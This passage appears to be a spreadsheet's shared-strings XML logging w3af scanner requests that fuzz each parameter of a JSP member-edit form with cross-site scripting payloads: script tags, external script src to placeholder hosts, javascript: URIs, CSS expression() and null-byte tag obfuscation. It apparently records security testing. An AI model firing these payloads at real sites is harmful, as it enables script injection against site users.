    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=wtgbk&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=&lt;script&gt;fake_alert("9nsa")&lt;/script&gt;&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=&lt;script/src=http://9nsa/x.js&gt;&lt;/script&gt;&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=&lt;script&gt;fake_alert(string.fromcharcode(9nsa))&lt;/script&gt;&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=&lt;script+src=http://9nsa/x.js&gt;&lt;/script&gt;&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=&lt;script&gt;a=/9nsa/fake_alert(a.source)&lt;/script&gt;&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=&lt;_x0000_script&gt;fake_alert("9nsa")&lt;/script&gt;&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad='';!--"&lt;9nsa&gt;=&amp;{()}&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=shqh5&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=&lt;script&gt;a=/wrxq/fake_alert(a.source)&lt;/script&gt;&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=&lt;script+src=http://wrxq/x.js&gt;&lt;/script&gt;&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=&lt;script&gt;fake_alert("wrxq")&lt;/script&gt;&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre='';!--"&lt;wrxq&gt;=&amp;{()}&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=&lt;script&gt;fake_alert(string.fromcharcode(wrxq))&lt;/script&gt;&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=&lt;script/src=http://wrxq/x.js&gt;&lt;/script&gt;&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=&lt;_x0000_script&gt;fake_alert("wrxq")&lt;/script&gt;&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=&lt;script/xss+src=http://wrxq/x.js&gt;&lt;/script&gt;&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=hvgzr&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=&lt;script/src=http://0dfy/x.js&gt;&lt;/script&gt;&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc='';!--"&lt;0dfy&gt;=&amp;{()}&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=&lt;script&gt;fake_alert("0dfy")&lt;/script&gt;&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=&lt;_x0000_script&gt;fake_alert("0dfy")&lt;/script&gt;&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=&lt;script&gt;a=/0dfy/fake_alert(a.source)&lt;/script&gt;&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=&lt;script/xss+src=http://0dfy/x.js&gt;&lt;/script&gt;&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=&lt;script&gt;fake_alert(string.fromcharcode(0dfy))&lt;/script&gt;&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=&lt;script+src=http://0dfy/x.js&gt;&lt;/script&gt;&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=bfshg&lt;ddqr&gt;ddqr"ddqr'ddqr(ddqr)bfshg&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=&lt;script&gt;a=/jztl/alert(a.source)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javas_x0000_cript:alert("jztl");&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=&lt;script+src=http://jztl/x.js&gt;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&lt;/a/style="xss:exp/**/ression(alert('xss'))"&gt;&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=javas&amp;#x09;cript:alert("jztl");&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=&lt;iframe+src="javascript:alert('jztl');"&gt;&lt;/iframe&gt;&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=&lt;script/xss+src=http://jztl/x.js&gt;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'';!--"&lt;jztl&gt;=&amp;{()}&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=&lt;script&gt;alert("jztl")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&lt;_x0000_script&gt;alert("jztl")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&lt;scr_x0000_ipt&gt;alert("jztl")&lt;/sc_x0000_ript&gt;&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=javascript:alert("jztl");&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=&lt;script&gt;alert(string.fromcharcode(jztl))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&lt;script&gt;a=/ciad/fake_alert(a.source)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&lt;script&gt;fake_alert(string.fromcharcode(ciad))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&lt;script+src=http://ciad/x.js&gt;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&lt;_x0000_script&gt;fake_alert("ciad")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&lt;script&gt;fake_alert("ciad")&lt;/script&gt;&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=&lt;script/xss+src=http://ciad/x.js&gt;&lt;/script&gt;&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=ryhbt</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=&lt;script&gt;fake_alert(string.fromcharcode(l8ph))&lt;/script&gt;&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login='';!--"&lt;l8ph&gt;=&amp;{()}&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=&lt;script/xss+src=http://l8ph/x.js&gt;&lt;/script&gt;&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=&lt;script/src=http://l8ph/x.js&gt;&lt;/script&gt;&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=&lt;script&gt;fake_alert("l8ph")&lt;/script&gt;&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=&lt;script+src=http://l8ph/x.js&gt;&lt;/script&gt;&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=&lt;script&gt;a=/l8ph/fake_alert(a.source)&lt;/script&gt;&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=&lt;_x0000_script&gt;fake_alert("l8ph")&lt;/script&gt;&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=&lt;script/xss+src=http://plp4/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=&lt;script/src=http://plp4/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo='';!--"&lt;plp4&gt;=&amp;{()}</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=&lt;script&gt;fake_alert("plp4")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=&lt;script+src=http://plp4/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=&lt;script&gt;fake_alert(string.fromcharcode(plp4))&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=payjs&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=etoaa&lt;d6xg&gt;d6xg"d6xg'd6xg(d6xg)etoaa&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=&lt;script&gt;alert("gic6")&lt;/script&gt;&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=&lt;script+src=http://gic6/x.js&gt;&lt;/script&gt;&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=javas&amp;#x09;cript:alert("gic6");&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=&lt;scr_x0000_ipt&gt;alert("gic6")&lt;/sc_x0000_ript&gt;&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp='';!--"&lt;gic6&gt;=&amp;{()}&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=javascript:alert("gic6");&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=&lt;/a/style="xss:exp/**/ression(alert('xss'))"&gt;&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp='';!--"&lt;cw1a&gt;=&amp;{()}&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=&lt;script&gt;a=/cw1a/fake_alert(a.source)&lt;/script&gt;&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=&lt;script&gt;fake_alert(string.fromcharcode(cw1a))&lt;/script&gt;&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=&lt;script&gt;fake_alert("cw1a")&lt;/script&gt;&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=&lt;script+src=http://cw1a/x.js&gt;&lt;/script&gt;&amp;provincia=0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=o9pgy&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=dqwfh&lt;e06a&gt;e06a"e06a'e06a(e06a)dqwfh&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=&lt;script&gt;a=/827y/alert(a.source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'';!--"&lt;827y&gt;=&amp;{()}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/xss+src=http://827y/x.js&gt;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&gt;alert(string.fromcharcode(827y)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/a/style="xss:exp/**/ression(alert('xss'))"&gt;&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=javascript:alert("827y")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&gt;alert("827y"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_x0000_script&gt;alert("827y"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&gt;a=/sek8/fake_alert(a.source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+src=http://sek8/x.js&gt;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/src=http://sek8/x.js&gt;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&gt;fake_alert("sek8"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_x0000_script&gt;fake_alert("sek8"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'';!--"&lt;sek8&gt;=&amp;{()}&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=jwvr2&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=&lt;script&gt;a=/offh/fake_alert(a.source)&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=&lt;script&gt;fake_alert("offh")&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni='';!--"&lt;offh&gt;=&amp;{()}&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=&lt;script/xss+src=http://offh/x.js&gt;&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=&lt;_x0000_script&gt;fake_alert("offh")&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=&lt;script+src=http://offh/x.js&gt;&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=&lt;script&gt;fake_alert(string.fromcharcode(offh))&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=tuyvi&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=0&amp;dni=56&amp;direccion=&lt;script&gt;fake_alert(string.fromcharcode(zdwf))&lt;/script&gt;&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
